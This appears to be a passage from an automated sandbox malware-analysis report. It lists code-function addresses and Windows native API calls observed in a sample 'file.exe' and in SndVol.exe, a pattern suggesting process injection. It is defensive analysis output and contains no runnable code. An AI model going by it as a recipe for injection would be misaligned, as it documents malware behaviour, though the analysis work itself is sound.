                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752BF0 NtAllocateVirtualMemory,4_2_01752BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752BE0 NtQueryValueKey,4_2_01752BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752BA0 NtEnumerateValueKey,4_2_01752BA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752B80 NtQueryInformationFile,4_2_01752B80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752AF0 NtWriteFile,4_2_01752AF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752AD0 NtReadFile,4_2_01752AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752AB0 NtWaitForSingleObject,4_2_01752AB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752D30 NtUnmapViewOfSection,4_2_01752D30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752D10 NtMapViewOfSection,4_2_01752D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752D00 NtSetInformationFile,4_2_01752D00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752DD0 NtDelayExecution,4_2_01752DD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752DB0 NtEnumerateKey,4_2_01752DB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752C60 NtCreateKey,4_2_01752C60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752C00 NtQueryInformationProcess,4_2_01752C00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752CF0 NtOpenProcess,4_2_01752CF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752CC0 NtQueryVirtualMemory,4_2_01752CC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752CA0 NtQueryInformationToken,4_2_01752CA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752F60 NtCreateProcessEx,4_2_01752F60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752F30 NtCreateSection,4_2_01752F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752FE0 NtCreateFile,4_2_01752FE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752FB0 NtResumeThread,4_2_01752FB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752FA0 NtQuerySection,4_2_01752FA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752F90 NtProtectVirtualMemory,4_2_01752F90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752E30 NtWriteVirtualMemory,4_2_01752E30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752EE0 NtQueueApcThread,4_2_01752EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752EA0 NtAdjustPrivilegesToken,4_2_01752EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752E80 NtReadVirtualMemory,4_2_01752E80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01753010 NtOpenDirectoryObject,4_2_01753010
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01753090 NtSetValueKey,4_2_01753090
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017539B0 NtGetContextThread,4_2_017539B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01753D70 NtOpenThread,4_2_01753D70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01753D10 NtOpenProcessToken,4_2_01753D10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05114650 NtSuspendThread,LdrInitializeThunk,9_2_05114650
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05114340 NtSetContextThread,LdrInitializeThunk,9_2_05114340
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112D10 NtMapViewOfSection,LdrInitializeThunk,9_2_05112D10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_05112D30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112DD0 NtDelayExecution,LdrInitializeThunk,9_2_05112DD0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_05112DF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_05112C70
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112C60 NtCreateKey,LdrInitializeThunk,9_2_05112C60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_05112CA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112F30 NtCreateSection,LdrInitializeThunk,9_2_05112F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112FB0 NtResumeThread,LdrInitializeThunk,9_2_05112FB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112FE0 NtCreateFile,LdrInitializeThunk,9_2_05112FE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_05112E80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112EE0 NtQueueApcThread,LdrInitializeThunk,9_2_05112EE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112B60 NtClose,LdrInitializeThunk,9_2_05112B60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_05112BA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_05112BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112BE0 NtQueryValueKey,LdrInitializeThunk,9_2_05112BE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112AD0 NtReadFile,LdrInitializeThunk,9_2_05112AD0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112AF0 NtWriteFile,LdrInitializeThunk,9_2_05112AF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051135C0 NtCreateMutant,LdrInitializeThunk,9_2_051135C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051139B0 NtGetContextThread,LdrInitializeThunk,9_2_051139B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112D00 NtSetInformationFile,9_2_05112D00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112DB0 NtEnumerateKey,9_2_05112DB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112C00 NtQueryInformationProcess,9_2_05112C00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112CC0 NtQueryVirtualMemory,9_2_05112CC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112CF0 NtOpenProcess,9_2_05112CF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112F60 NtCreateProcessEx,9_2_05112F60
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112F90 NtProtectVirtualMemory,9_2_05112F90
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112FA0 NtQuerySection,9_2_05112FA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112E30 NtWriteVirtualMemory,9_2_05112E30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112EA0 NtAdjustPrivilegesToken,9_2_05112EA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112B80 NtQueryInformationFile,9_2_05112B80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05112AB0 NtWaitForSingleObject,9_2_05112AB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05113010 NtOpenDirectoryObject,9_2_05113010
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05113090 NtSetValueKey,9_2_05113090
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05113D10 NtOpenProcessToken,9_2_05113D10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05113D70 NtOpenThread,9_2_05113D70
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B9330 NtCreateFile,9_2_030B9330
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B97A0 NtAllocateVirtualMemory,9_2_030B97A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B9640 NtClose,9_2_030B9640
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B95A0 NtDeleteFile,9_2_030B95A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B94A0 NtReadFile,9_2_030B94A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8F976 NtMapViewOfSection,9_2_04F8F976
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056803D80_2_056803D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05680D880_2_05680D88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05680D980_2_05680D98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05687BB80_2_05687BB8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740B7280_2_0740B728
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07402E780_2_07402E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740C6380_2_0740C638
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740A5080_2_0740A508
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740AD280_2_0740AD28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740D7600_2_0740D760
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740D7700_2_0740D770
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740B7180_2_0740B718
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740C60D0_2_0740C60D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074096190_2_07409619
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074096280_2_07409628
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740AD1A0_2_0740AD1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740E5C00_2_0740E5C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740EDD00_2_0740EDD0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740EDE00_2_0740EDE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074045A10_2_074045A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740E5B00_2_0740E5B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740E5B80_2_0740E5B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740A4F70_2_0740A4F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740EB400_2_0740EB40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740EB500_2_0740EB50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740E9D00_2_0740E9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740E9E00_2_0740E9E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C231980_2_07C23198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C24B100_2_07C24B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C2C7780_2_07C2C778
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C236800_2_07C23680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C236700_2_07C23670
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C2E4F00_2_07C2E4F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C234200_2_07C23420
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C244200_2_07C24420
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C244300_2_07C24430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C234300_2_07C23430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C2C3400_2_07C2C340
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C231880_2_07C23188
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C2316F0_2_07C2316F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C200400_2_07C20040
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C200070_2_07C20007
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C24FE10_2_07C24FE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C24FF00_2_07C24FF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C24B000_2_07C24B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C238C80_2_07C238C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C238D80_2_07C238D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0DF51F600_2_0DF51F60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00418C134_2_00418C13
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004029804_2_00402980
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0042F2634_2_0042F263
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004033C04_2_004033C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004023FB4_2_004023FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041047C4_2_0041047C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004024004_2_00402400
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004104834_2_00410483
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004025E44_2_004025E4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004025F04_2_004025F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402E404_2_00402E40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416E034_2_00416E03
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402E324_2_00402E32
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E6834_2_0040E683
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004106A34_2_004106A3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E7D34_2_0040E7D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A81584_2_017A8158
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA1184_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017101004_2_01710100
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D81CC4_2_017D81CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E01AA4_2_017E01AA
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B20004_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA3524_2_017DA352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E3F04_2_0172E3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E03E64_2_017E03E6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C02744_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A02C04_2_017A02C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017205354_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E05914_2_017E0591
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D24464_2_017D2446
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE4F64_2_017CE4F6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017207704_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017447504_2_01744750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171C7C04_2_0171C7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173C6E04_2_0173C6E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017369624_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A04_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017EA9A64_2_017EA9A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017228404_2_01722840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172A8404_2_0172A840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E8F04_2_0174E8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017068B84_2_017068B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAB404_2_017DAB40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D6BD74_2_017D6BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA804_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BCD1F4_2_017BCD1F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172AD004_2_0172AD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171ADE04_2_0171ADE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01738DBF4_2_01738DBF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720C004_2_01720C00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710CF24_2_01710CF2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0CB54_2_017C0CB5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01794F404_2_01794F40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740F304_2_01740F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01762F284_2_01762F28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172CFE04_2_0172CFE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01712FC84_2_01712FC8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179EFA04_2_0179EFA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720E594_2_01720E59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DEE264_2_017DEE26
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DEEDB4_2_017DEEDB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732E904_2_01732E90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCE934_2_017DCE93
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170F1724_2_0170F172
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017EB16B4_2_017EB16B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175516C4_2_0175516C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172B1B04_2_0172B1B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D70E94_2_017D70E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF0E04_2_017DF0E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CF0CC4_2_017CF0CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017270C04_2_017270C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170D34C4_2_0170D34C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D132D4_2_017D132D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0176739A4_2_0176739A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C12ED4_2_017C12ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173B2C04_2_0173B2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017252A04_2_017252A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D75714_2_017D7571
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BD5B04_2_017BD5B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017114604_2_01711460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF43F4_2_017DF43F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF7B04_2_017DF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D16CC4_2_017D16CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017299504_2_01729950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173B9504_2_0173B950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B59104_2_017B5910
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178D8004_2_0178D800
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017238E04_2_017238E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFB764_2_017DFB76
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01795BF04_2_01795BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175DBF94_2_0175DBF9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173FB804_2_0173FB80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01793A6C4_2_01793A6C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFA494_2_017DFA49
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D7A464_2_017D7A46
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CDAC64_2_017CDAC6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01765AA04_2_01765AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BDAAC4_2_017BDAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D7D734_2_017D7D73
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D1D5A4_2_017D1D5A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01723D404_2_01723D40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173FDC04_2_0173FDC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01799C324_2_01799C32
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFCF24_2_017DFCF2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFF094_2_017DFF09
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFFB14_2_017DFFB1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01721F924_2_01721F92
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01729EB04_2_01729EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E05359_2_050E0535
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A05919_2_051A0591
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051844209_2_05184420
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051924469_2_05192446
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518E4F69_2_0518E4F6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051047509_2_05104750
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E07709_2_050E0770
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DC7C09_2_050DC7C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FC6E09_2_050FC6E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D01009_2_050D0100
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517A1189_2_0517A118
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051681589_2_05168158
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A01AA9_2_051A01AA
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051981CC9_2_051981CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051720009_2_05172000
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519A3529_2_0519A352
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A03E69_2_051A03E6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EE3F09_2_050EE3F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051802749_2_05180274
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051602C09_2_051602C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517CD1F9_2_0517CD1F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EAD009_2_050EAD00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F8DBF9_2_050F8DBF
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DADE09_2_050DADE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E0C009_2_050E0C00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05180CB59_2_05180CB5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D0CF29_2_050D0CF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05100F309_2_05100F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05182F309_2_05182F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05122F289_2_05122F28
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05154F409_2_05154F40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0515EFA09_2_0515EFA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D2FC89_2_050D2FC8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050ECFE09_2_050ECFE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519EE269_2_0519EE26
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E0E599_2_050E0E59
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519CE939_2_0519CE93
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F2E909_2_050F2E90
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519EEDB9_2_0519EEDB
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F69629_2_050F6962
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E29A09_2_050E29A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051AA9A69_2_051AA9A6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E28409_2_050E2840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EA8409_2_050EA840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050C68B89_2_050C68B8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0510E8F09_2_0510E8F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519AB409_2_0519AB40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05196BD79_2_05196BD7
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DEA809_2_050DEA80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051975719_2_05197571
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517D5B09_2_0517D5B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F43F9_2_0519F43F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D14609_2_050D1460
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F7B09_2_0519F7B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051916CC9_2_051916CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051AB16B9_2_051AB16B
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0511516C9_2_0511516C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050CF1729_2_050CF172
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EB1B09_2_050EB1B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E70C09_2_050E70C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518F0CC9_2_0518F0CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051970E99_2_051970E9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F0E09_2_0519F0E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519132D9_2_0519132D
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050CD34C9_2_050CD34C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0512739A9_2_0512739A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E52A09_2_050E52A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FB2C09_2_050FB2C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051812ED9_2_051812ED
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05191D5A9_2_05191D5A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E3D409_2_050E3D40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05197D739_2_05197D73
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FFDC09_2_050FFDC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05159C329_2_05159C32
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FCF29_2_0519FCF2
